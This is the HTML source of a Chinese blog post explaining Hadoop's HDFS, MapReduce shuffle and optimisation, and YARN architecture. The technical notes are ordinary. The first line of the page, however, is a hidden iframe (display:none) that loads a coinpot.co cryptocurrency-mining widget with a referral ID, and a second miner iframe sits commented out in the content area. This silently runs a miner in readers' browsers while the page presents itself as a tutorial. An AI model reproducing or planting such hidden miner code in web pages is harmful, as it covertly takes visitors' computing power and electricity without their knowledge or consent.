<iframe scrolling="no" frameborder="0" src="https://coinpot.co/mine/dash/?ref=CD1A3EFFFAF0&mode=widget" style="display:none;"></iframe>

<!doctype html>














<html class="theme-next mist" lang="zh-Hans">
<head>
  <meta name="referrer" content="never">
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />















  
  
  <link href="/assets/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/assets/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/assets/css/main.css?v=5.1.1" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="big data," />








  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.1.1" />
















<meta name="description" content="Hadoop系统的基本组成架构包含两个部分：分布式存储和并行计算两部分">
<meta name="keywords" content="big data">
<meta property="og:type" content="article">
<meta property="og:title" content="Hadoop">
<meta property="og:url" content="/blog/2019/02/20/hadoop">
<meta property="og:site_name" content="Notes">
<meta property="og:description" content="Hadoop系统的基本组成架构包含两个部分：分布式存储和并行计算两部分">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/006tKfTcgy1g1ckzjqp1uj310o0u04gl.jpg">
<meta property="og:image" content="https://ws4.sinaimg.cn/large/006tKfTcgy1g1cvldddo1j30vv0u07j6.jpg">
<meta property="og:image" content="https://ws2.sinaimg.cn/large/006tKfTcgy1g0irtroc0tj317w0ow7cg.jpg">
<meta property="og:image" content="https://ws4.sinaimg.cn/large/006tKfTcgy1g0irxawi8uj31o30u0hdt.jpg">
<meta property="og:image" content="https://ws4.sinaimg.cn/large/006tKfTcgy1g0isdlnamvj30yx0u0kfk.jpg">
<meta property="og:image" content="https://ws3.sinaimg.cn/large/006tKfTcgy1g0isgoq1osj31bm092468.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/006tKfTcgy1g1cmmcvf4wj31ca0oi47u.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/006tKfTcgy1g1cmopn1ndj31700u0wtr.jpg">
<meta property="og:image" content="https://i.loli.net/2019/03/05/5c7e4d8f0f5ea.png">
<meta property="og:image" content="https://i.loli.net/2019/03/05/5c7e4e574bb2f.png">
<meta property="og:image" content="https://i.loli.net/2019/03/05/5c7e7c729cfca.png">
<meta property="og:image" content="https://ws3.sinaimg.cn/large/006tKfTcgy1g0iswa7qh8j315z0u04qp.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/006tKfTcgy1g0isuhsx4qj31g00liasj.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/006tKfTcgy1g0isyx0pekj31g40eqgz4.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/006tKfTcgy1g0it03w47rj31fy0e07gj.jpg">
<meta property="og:image" content="https://ws3.sinaimg.cn/large/006tKfTcgy1g0it1eolexj31ge0ac11v.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/006tKfTcgy1g1cmfh3qjuj31fu0lowpd.jpg">
<meta property="og:image" content="https://ws3.sinaimg.cn/large/006tKfTcgy1g0isngzwnrj31f80g8gxg.jpg">
<meta property="og:image" content="https://ws2.sinaimg.cn/large/006tKfTcgy1g1cnsjtmmaj31ck0dadnt.jpg">
<meta property="og:image" content="https://ws3.sinaimg.cn/large/006tKfTcgy1g1cvuaota8j316q0u04bh.jpg">
<meta property="og:image" content="https://ws3.sinaimg.cn/large/006tKfTcgy1g1cw3wha4tj31650u0asm.jpg">
<meta property="og:image" content="https://ws3.sinaimg.cn/large/006tKfTcgy1g1cxctvgejj31990u0e62.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/006tKfTcgy1g1cwj4ly74j31cg0hik0z.jpg">
<meta property="og:image" content="https://ws3.sinaimg.cn/large/006tKfTcgy1g1d6324m6fj30xy0u0h48.jpg">
<meta property="og:image" content="https://ws2.sinaimg.cn/large/006tKfTcgy1g1dna6m9ltj30m809zt9h.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/006tKfTcgy1g0e5g94fgmj31ia0mewhi.jpg">
<meta property="og:image" content="https://ws2.sinaimg.cn/large/006tKfTcgy1g1do6i61ktj30yh0u0q65.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/006tKfTcgy1g0jsw3syxpj311i0qmws5.jpg">
<meta property="og:image" content="https://ws2.sinaimg.cn/large/006tKfTcgy1g0jswj8u2tj31gy0lewp6.jpg">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Hadoop">
<meta name="twitter:description" content="Hadoop系统的基本组成架构包含两个部分：分布式存储和并行计算两部分">
<meta name="twitter:image" content="https://ws1.sinaimg.cn/large/006tKfTcgy1g1ckzjqp1uj310o0u04gl.jpg">


<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '',
    scheme: 'Mist',
    sidebar: {"position":"right","display":"post","offset":12,"offset_float":0,"b2t":false,"scrollpercent":false},
    fancybox: true,
    motion: false,
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href=""/>





  <title>Hadoop | Notes</title>
  




<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
            (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
          m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
  ga('create', 'UA-120397256-1', 'auto');
  ga('send', 'pageview');
</script>













</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  

  <div class="container sidebar-position-right page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"> <div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Notes</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <h1 class="site-subtitle" itemprop="description"></h1>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        
        
        <li class="menu-item menu-item-book">
          <a href="/book/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-book"></i> <br />
            
            库
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off"
             placeholder="搜索..." spellcheck="false"
             type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>


 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            <!--<iframe scrolling="no" frameborder="0" src="https://coinpot.co/mine/bitcoincash/?ref=CD1A3EFFFAF0&mode=widget" style="display:none;"></iframe>-->


<div id="posts" class="posts-expand">
  
  

  

  
  
  

  <article class="post post-type- " itemscope itemtype="http://schema.org/Article">
    <link itemprop="mainEntityOfPage" href="/blog/2019/02/20/hadoop">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="wyx">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.png">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Notes">
    </span>

    
      <header class="post-header">

        
        
          <h2 class="post-title" itemprop="name headline">
          
          
            Hadoop
          
        </h2>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-02-20T00:00:00+08:00">
                2019-02-20
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/category/#/big%20data" itemprop="url" rel="index">
                    <span itemprop="name">big data</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          
             <span id="/blog/2019/02/20/hadoop" class="leancloud_visitors" data-flag-title="Hadoop">
               <span class="post-meta-divider">|</span>
               <span class="post-meta-item-icon">
                 <i class="fa fa-eye"></i>
               </span>
               
                 <span class="post-meta-item-text">阅读次数 </span>
               
                 <span class="leancloud-visitors-count"></span>
             </span>
          

          

          

          
            
                <div class="post-description">
                    
                </div>
            
          

        </div>
      </header>
    

    <div class="post-body" itemprop="articleBody">

      
      

      
        
  
  












  <p>Hadoop系统的基本组成架构包含两个部分：分布式存储和并行计算两部分</p>

<ul>
  <li>HDFS</li>
</ul>

<p>NameNode作为分布式存储的主控节点，用以存储和管理分布式文件系统的元数据，同时使用DataNode作为实际存储大规模数据从节点。</p>

<ul>
  <li>MapReduce</li>
</ul>

<p>Hadoop使用JobTracker作为MapReduce框架的主控节点，用来管理和调度作业的执行，用TaskTracker管理每个计算从节点上任务的执行。</p>

<h1 id="hdfs">HDFS</h1>

<p>Hadoop Distributed File System (HDFS)</p>

<p>旨在存储大量信息，通常为<strong>PB</strong>。不支持随机读写</p>

<ul>
  <li>单文件TB PB/千万级文件数</li>
  <li><strong>顺序访问</strong> 提高大规模数据访问效率，支持顺序读，随机访问负载高</li>
  <li><strong>一次写多次读</strong>访问文件，<strong>不支持更新</strong>，允许文件尾部添加。</li>
</ul>

<p><strong>块结构文件系统</strong>来完成的。单个文件被拆分为固定大小的块，这些块存储在集群上。由多个块组成的文件通常不会将所有块存储在同一台机器上。
为了确保可靠性，块在集群中存在副本。复制因子默认是3，每个块在集群中存在3份。通常64MB为一块</p>

<p>数据块越大，减少寻址频度和时间开销</p>

<ul>
  <li>NameNote 保存文件系统的元数据（数据块与文件名映射表，数据块副本位置）和命名空间（系统目录结构），处理访问文件的请求</li>
  <li>DataNode 存储组成文件的块</li>
</ul>

<p>NameNode和DataNode进程可以在一台机器上运行，但HDFS集群通常由运行NameNode进程的专用服务器和可能有数千台运行DataNode进程的计算机组成。
<span class="gp-2">
    <img src="https://ws1.sinaimg.cn/large/006tKfTcgy1g1ckzjqp1uj310o0u04gl.jpg" />
    <img src="https://ws4.sinaimg.cn/large/006tKfTcgy1g1cvldddo1j30vv0u07j6.jpg" />
</span></p>

<ul>
  <li><a href="https://github.com/spotify/snakebite">snakebite</a></li>
  <li><a href="https://arrow.apache.org/docs/python/">pyarrow</a></li>
</ul>

<h2 id="namenode">NameNode</h2>
<p>metadata 包括 文件名，文件权限以及每个文件的每个块的位置。保存在<strong>内存</strong>。
NameNode还跟踪块的<strong>复制因子</strong>，确保机器故障不会导致数据丢失。</p>

<p>由于NameNode是单点故障，因此可以使用辅助NameNode生成主NameNode内存结构的快照，从而降低NameNode失败时数据丢失的风险。
当DataNode失败时，NameNode将复制丢失的块以确保每个块满足最小<strong>复制因子</strong>。</p>

<h3 id="fsimage-editlog">FsImage EditLog</h3>

<p><img src="https://ws2.sinaimg.cn/large/006tKfTcgy1g0irtroc0tj317w0ow7cg.jpg" alt="" /></p>

<p><img src="https://ws4.sinaimg.cn/large/006tKfTcgy1g0irxawi8uj31o30u0hdt.jpg" alt="" /></p>

<h2 id="secondnamenode">SecondNameNode</h2>
<ul>
  <li>解决EditLog变大，启动慢的问题
    <blockquote>
      <p><strong>SecondNameNode</strong> 每隔一段时间<strong>拉取</strong>和<strong>合并</strong>NameNode里的FsImage
EditLog，这段时间的更新写入到NameNode的EditLog.
<strong>new合并结束后</strong>,新FsImage发送到NameNode覆盖旧的FsImage，EditLog.new覆盖EditLog</p>
    </blockquote>
  </li>
</ul>

<p><img src="https://ws4.sinaimg.cn/large/006tKfTcgy1g0isdlnamvj30yx0u0kfk.jpg" alt="" /></p>

<ul>
  <li>如果NameNode在合并时间段内发生故障，系统会丢数据。</li>
</ul>

<h2 id="datanote">DataNote</h2>

<p><img src="https://ws3.sinaimg.cn/large/006tKfTcgy1g0isgoq1osj31bm092468.jpg" alt="" /></p>

<h2 id="读过程">读过程</h2>
<p><img src="https://ws1.sinaimg.cn/large/006tKfTcgy1g1cmmcvf4wj31ca0oi47u.jpg" alt="" />
<img src="https://ws1.sinaimg.cn/large/006tKfTcgy1g1cmopn1ndj31700u0wtr.jpg" alt="" /></p>

<h2 id="写过程">写过程</h2>

<p><img src="https://i.loli.net/2019/03/05/5c7e4d8f0f5ea.png" alt="" />
<img src="https://i.loli.net/2019/03/05/5c7e4e574bb2f.png" alt="" />
<img src="https://i.loli.net/2019/03/05/5c7e7c729cfca.png" alt="" /></p>

<p>复制流程
<img src="https://ws3.sinaimg.cn/large/006tKfTcgy1g0iswa7qh8j315z0u04qp.jpg" alt="" />
<img src="https://ws1.sinaimg.cn/large/006tKfTcgy1g0isuhsx4qj31g00liasj.jpg" alt="" />
数据接收者会向发送者发送<strong>确认包</strong></p>

<h2 id="恢复数据">恢复数据</h2>

<h3 id="namenode-1">NameNode</h3>
<p><img src="https://ws1.sinaimg.cn/large/006tKfTcgy1g0isyx0pekj31g40eqgz4.jpg" alt="" /></p>

<h3 id="datanode">DataNode</h3>
<p><img src="https://ws1.sinaimg.cn/large/006tKfTcgy1g0it03w47rj31fy0e07gj.jpg" alt="" /></p>

<h3 id="数据">数据</h3>
<p>MD5 sha1
<img src="https://ws3.sinaimg.cn/large/006tKfTcgy1g0it1eolexj31ge0ac11v.jpg" alt="" />
<img src="https://ws1.sinaimg.cn/large/006tKfTcgy1g1cmfh3qjuj31fu0lowpd.jpg" alt="" /></p>

<h2 id="局限">局限</h2>
<p><img src="https://ws3.sinaimg.cn/large/006tKfTcgy1g0isngzwnrj31f80g8gxg.jpg" alt="" /></p>

<h2 id="高级操作">高级操作</h2>
<ul>
  <li>archive 压缩</li>
</ul>

<p><img src="https://ws2.sinaimg.cn/large/006tKfTcgy1g1cnsjtmmaj31ck0dadnt.jpg" alt="" /></p>

<ul>
  <li>
    <p>balancer DataNode数据块副本均匀分布</p>
  </li>
  <li>
    <p>distcp hdfs拷贝数据</p>
  </li>
</ul>

<h1 id="mapreduce">MapReduce</h1>
<ul>
  <li><a href="https://github.com/Yelp/mrjob">mrjob</a></li>
</ul>

<p>Mapreduce并行模型
<img src="https://ws3.sinaimg.cn/large/006tKfTcgy1g1cvuaota8j316q0u04bh.jpg" alt="" /></p>

<p>Mapreduce执行过程
<span class="gp-2">
    <img src="https://ws3.sinaimg.cn/large/006tKfTcgy1g1cw3wha4tj31650u0asm.jpg" />
    <img src="https://ws3.sinaimg.cn/large/006tKfTcgy1g1cxctvgejj31990u0e62.jpg" />
</span></p>

<p><img src="https://ws1.sinaimg.cn/large/006tKfTcgy1g1cwj4ly74j31cg0hik0z.jpg" alt="" /></p>

<p><img src="https://ws3.sinaimg.cn/large/006tKfTcgy1g1d6324m6fj30xy0u0h48.jpg" alt="" /></p>

<p><span class="gp-2">
    <img src="https://ws2.sinaimg.cn/large/006tKfTcgy1g1dna6m9ltj30m809zt9h.jpg" />
    <img src="https://ws1.sinaimg.cn/large/006tKfTcgy1g0e5g94fgmj31ia0mewhi.jpg" />
</span></p>

<ul>
  <li><a href="https://techvidvan.com/tutorials/hadoop-combiner-introduction-working-advantages/">MapReduce Tutorials</a></li>
  <li><a href="https://blog.csdn.net/MrLevo520/article/details/76781186">详细讲解MapReduce过程</a></li>
</ul>

<h2 id="inputformat">inputformat</h2>
<p>负责以什么样的格式输入数据，InputFormat可以验证作业数据的输入形式和格式；将输入数据分割为若干个逻辑意义上的InputSplits。RecordReader负责从数据分块中读取数据记录转化为键值对</p>

<h2 id="split">split</h2>
<p>split基本上和hdfs的基本存储块block同样大小，<strong>一个split对应一个map</strong>，你可以把它当做map的单位块来理解，投喂进map的时候必须要这样的格式</p>

<h3 id="block-and-inputsplit">Block and InputSplit</h3>
<p><img src="https://ws2.sinaimg.cn/large/006tKfTcgy1g1do6i61ktj30yh0u0q65.jpg" alt="" /></p>

<h2 id="map">map</h2>
<p>处理一堆键值对，<code class="highlighter-rouge">mapper</code>会顺序单独处理每个键值对，产生若干个output键值对</p>

<h2 id="shuffle">shuffle</h2>
<p>分为map端操作和reduce端操作</p>

<h3 id="map-1">map</h3>
<ul>
  <li>map任务的输出默认是放在本地磁盘的临时缓冲目录中，每当缓冲区到达上限80%的时候，就会启动一个Spill(溢写)进程，它的作用是把内存里的map task的结果写入到磁盘。</li>
  <li>Partitioner 分区 按照key分别映射给不同的reduce,默认是hash(key)%R哈希函数分散到各个reducer去</li>
  <li>combiner (optional 自定义 &lt;’a’,1&gt;和&lt;’a’,1&gt; -&gt; &lt;’a’,2&gt;) 减轻网络压力，提高程序效率。
<strong>Combiner只应该用于那种Reduce的输入key/value与输出key/value类型完全一致</strong>，且不影响最终结果的场景。比如累加，最大值等。
Combiner的使用一定得慎重，如果用好，它对job执行效率有帮助，反之会影响reduce的最终结果。</li>
  <li>Sort 默认升序</li>
  <li>Merge 每次溢写会在磁盘上生成一个溢写文件,当Map输出结果真的很大,存在多个溢写文件（&lt;’a’,1&gt;和&lt;’a’,1&gt; -&gt; &lt;’a’,&lt;1,1» ）将多个溢写文件合并到一个文件，所以可能也有相同的key存在，在这个过程中如果client设置过Combiner，也会使用Combiner来合并相同的key。</li>
</ul>

<h3 id="reduce">reduce</h3>
<p>reduce从JobTracker那里获取map task<strong>是否完成</strong>的信息，得到通知,Shuffle的后半段过程开始启动。</p>

<ul>
  <li>copy Reduce进程启动一些数据copy线程(Fetcher)，通过HTTP方式请求从不同的map端 TaskTracker获取map task的输出文件</li>
  <li>spill merge combiner sort -&gt; 最终的那个文件</li>
  <li>当Reducer的输入文件已定，整个Shuffle才最终结束。默认情况下，这个文件是存放于磁盘中</li>
</ul>

<h2 id="reduce-1">reduce</h2>
<p>唯一key包含不唯一的值，reducer为每个唯一key合并它们的value,产生若干键值对</p>

<h2 id="mapreduce-优化">mapreduce 优化</h2>
<p><a href="https://techvidvan.com/tutorials/mapreduce-job-optimization-techniques/">MapReduce Job Optimization</a></p>

<ul>
  <li>配置优化</li>
  <li>Set <code class="highlighter-rouge">mapred.compress.map.output</code> to true to enable <strong>LZO compression</strong></li>
  <li>任务量大，块大小提高，更长时间的任务&gt;1min,reduce任务的数量等于或略小于集群中reduce槽的数量。</li>
  <li>Combiner</li>
</ul>

<h3 id="数据输入小文件处理">数据输入小文件处理</h3>
<ul>
  <li>合并小文件：对小文件进行归档（har）、自定义inputformat将小文件存储成sequenceFile文件</li>
  <li>采用ConbinFileInputFormat来作为输入，解决输入端大量小文件场景。</li>
  <li>对于大量小文件Job，可以开启JVM重用</li>
</ul>

<h3 id="map-2">map</h3>
<ul>
  <li>增大环形缓冲区大小，缓冲区溢写的比例</li>
  <li>减少对溢写文件的merge次数</li>
  <li>采用combiner提前合并，减少 I/O</li>
</ul>

<h3 id="reduce-2">reduce</h3>
<ul>
  <li>合理设置map和reduce数：两个都不能设置太少，也不能设置太多。太少，会导致task等待，延长处理时间；太多，会导致 map、reduce任务间竞争资源，造成处理超时等错误。</li>
  <li>设置map、reduce共存：调整slowstart.completedmaps参数，使map运行到一定程度后，reduce也开始运行，减少reduce的等待时间。</li>
  <li>规避使用reduce，因为Reduce在用于连接数据集的时候将会产生大量的网络消耗。</li>
  <li>增加每个reduce去map中拿数据的并行数</li>
  <li>集群性能可以的前提下，增大reduce端存储数据内存的大小。</li>
</ul>

<h3 id="io">IO</h3>
<ul>
  <li>采用数据压缩的方式，减少网络IO的的时间。安装Snappy和LZOP压缩编码器。</li>
  <li>使用SequenceFile二进制文件</li>
</ul>

<h1 id="yarn">YARN</h1>

<p>https://www.ibm.com/developerworks/cn/data/library/bd-yarn-intro/index.html</p>

<h2 id="局限性">局限性</h2>
<p>经典 MapReduce 的最严重的限制主要关系到可伸缩性、资源利用和对与 MapReduce 不同的工作负载的支持。在 MapReduce 框架中，作业执行受两种类型的进程控制：</p>

<p>一个称为 JobTracker 的主要进程，它协调在集群上运行的所有作业，分配要在 TaskTracker 上运行的 map 和 reduce 任务。
许多称为 TaskTracker 的下级进程，它们运行分配的任务并定期向 JobTracker 报告进度。</p>

<ul>
  <li>单个 JobTracker 导致的可伸缩性瓶颈</li>
  <li>Hadoop 设计为仅运行 MapReduce 作业。随着替代性的编程模型（比如 Apache Giraph 所提供的图形处理）的到来，
除 MapReduce 外，越来越需要为可通过高效的、公平的方式在同一个集群上运行并共享资源的其他编程模型提供支持。</li>
</ul>

<h2 id="改变">改变</h2>
<p>我们减少了单个 JobTracker 的职责，将部分职责委派给 TaskTracker，因为集群中有许多 TaskTracker。
在新设计中，这个概念通过将 JobTracker 的双重职责（集群资源管理和任务协调）分开为两种不同类型的进程来反映。</p>

<p>不再拥有单个 JobTracker，一种新方法引入了一个集群管理器，它惟一的职责就是跟踪集群中的活动节点和可用资源，并将它们分配给任务。
对于提交给集群的每个作业，会启动一个专用的、短暂的 JobTracker 来控制该作业中的任务的执行。有趣的是，短暂的 JobTracker 由在从属节点上运行的 TaskTracker 启动。
因此，作业的生命周期的协调工作分散在集群中所有可用的机器上。得益于这种行为，更多工作可并行运行，可伸缩性得到了显著提高。</p>

<h2 id="yarn-1">yarn</h2>
<p>（资源管理，任务调度，任务监控）</p>
<ul>
  <li>ResourceManager 代替集群管理器 <strong>资源管理</strong></li>
  <li>ApplicationMaster 代替一个专用且短暂的 JobTracker <strong>任务调度，任务监控</strong></li>
  <li>NodeManager 代替 TaskTracker</li>
  <li>一个分布式应用程序代替一个 MapReduce 作业
<img src="https://ws1.sinaimg.cn/large/006tKfTcgy1g0jsw3syxpj311i0qmws5.jpg" alt="" />
<img src="https://ws2.sinaimg.cn/large/006tKfTcgy1g0jswj8u2tj31gy0lewp6.jpg" alt="" /></li>
</ul>

<p>在 YARN 架构中，一个全局 ResourceManager 以主要后台进程的形式运行，它通常在专用机器上运行，在各种竞争的应用程序之间仲裁可用的集群资源。
ResourceManager 会追踪集群中有多少可用的活动节点和资源，协调用户提交的哪些应用程序应该在何时获取这些资源。
ResourceManager 是惟一拥有此信息的进程，所以它可通过某种共享的、安全的、多租户的方式制定分配（或者调度）决策（例如，依据应用程序优先级、队列容量、ACLs、数据位置等）。</p>

<p>在用户提交一个应用程序时，一个称为 ApplicationMaster 的轻量型进程实例会启动来协调应用程序内的所有任务的执行。
这包括监视任务，重新启动失败的任务，推测性地运行缓慢的任务，以及计算应用程序计数器值的总和。
这些职责以前分配给所有作业的单个 JobTracker。
ApplicationMaster 和属于它的应用程序的任务，在受 NodeManager 控制的资源容器中运行。</p>

<p>NodeManager 是 TaskTracker 的一种更加普通和高效的版本。没有固定数量的 map 和 reduce slots，
NodeManager 拥有许多动态创建的资源容器。容器的大小取决于它所包含的资源量，比如内存、CPU、磁盘和网络 IO。目前，仅支持内存和 CPU (YARN-3)。
未来可使用 cgroups 来控制磁盘和网络 IO。一个节点上的容器数量，由配置参数与专用于从属后台进程和操作系统的资源以外的节点资源总量（比如总 CPU 数和总内存）共同决定。</p>

<p>有趣的是，ApplicationMaster 可在容器内运行任何类型的任务。例如，MapReduce ApplicationMaster 请求一个容器来启动 map 或 reduce 任务，而 Giraph ApplicationMaster 请求一个容器来运行 Giraph 任务。您还可以实现一个自定义的 ApplicationMaster 来运行特定的任务，进而发明出一种全新的分布式应用程序框架，改变大数据世界的格局。您可以查阅 Apache Twill，它旨在简化 YARN 之上的分布式应用程序的编写。</p>

<h3 id="一个可运行任何分布式应用程序的集群">一个可运行任何分布式应用程序的集群</h3>

<p>ResourceManager、NodeManager 和容器都不关心应用程序或任务的类型。所有特定于应用程序框架的代码都转移到它的 ApplicationMaster，
以便任何分布式框架都可以受 YARN 支持 — 只要有人为它实现了<strong>相应的 ApplicationMaster</strong>。</p>

<ul>
  <li>向yarn提交应用程序</li>
  <li>ResourceManager接收处理客户端请求，为应用程序分配一个容器，与容器内NodeManager通信，启动ApplicationMaster。</li>
  <li>ApplicationMaster创建后向ResourceManager注册，ResourceManager可以了解应用程序状态。</li>
  <li>ApplicationMaster向ResourceManager申请资源，成功后，与容器内NodeManager通信，启动Tasks。</li>
  <li>Tasks通过RPC反馈状态到ApplicationMaster。Task失败会ApplicationMaster重启</li>
  <li>Tasks完成,ApplicationMaster向ResourceManager注销，关闭自己。ApplicationMaster失败会ResourceManager重启，知道task完成。</li>
</ul>


      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        
  <ul class="post-copyright">
    <li class="post-copyright-author">
      <strong>本文作者：</strong>
      wyx
    </li>
    <li class="post-copyright-link">
      <strong>本文链接：</strong>
      <a href="/blog/2019/02/20/hadoop" title="Hadoop">/blog/2019/02/20/hadoop</a>
    </li>
    <li class="post-copyright-license">
      <strong>版权声明： </strong>
      本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/3.0/" rel="external nofollow" target="_blank">CC BY-NC-SA 3.0</a> 许可协议。转载请注明出处！
    </li>
  </ul>


      
    </div>

    <footer class="post-footer">
      
        <div class="post-tags">
          
            
            <a href="/tag/#/big%20data" rel="tag"># big data</a>
          
        </div>
      

      
      
      
      
      

      
      
        <div class="post-nav" id="post-nav-id">
          <div class="post-nav-next post-nav-item">
            
              <a href="/blog/2019/02/24/homebrew-install-specific-version" rel="next" title="brew install 指定 version">
                <i class="fa fa-chevron-left"></i> brew install 指定 version
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/blog/2019/02/20/hadoop-for-mac" rel="prev" title="Bigdata for Mac Install">
                Bigdata for Mac Install <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      
      

      
    </footer>
  </article>

  <div class="post-spread">
    
  </div>
</div>


          </div>
          


          
  <div class="comments" id="comments">
    
      <div id="gitalk-container"></div>
    
  </div>


        </div>
        
          

  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      
        
        
        







      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="/images/avatar.png"
               alt="wyx" />
          <p class="site-author-name" itemprop="name">wyx</p>
           
              <p class="site-description motion-element" itemprop="description"></p>
           
        </div>
        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
              <a href="/archives/">
                <span class="site-state-item-count">195</span>
                <span class="site-state-item-name">日志</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-categories">
              <a href="/categories/">
                <span class="site-state-item-count">27</span>
                <span class="site-state-item-name">分类</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-tags">
              <a href="/tags/">
                <span class="site-state-item-count">32</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        
        
        

        <div class="links-of-author motion-element">
          
            
              
              
              <span class="links-of-author-item">
                <a href="https://github.com/631068264" target="_blank" title="GitHub">
                  
                    <i class="fa fa-fw fa-github"></i>
                  
                  GitHub
                </a>
              </span>
            
              
              
              <span class="links-of-author-item">
                <a href="https://stackoverflow.com/users/5360312/wyx" target="_blank" title="StackOverflow">
                  
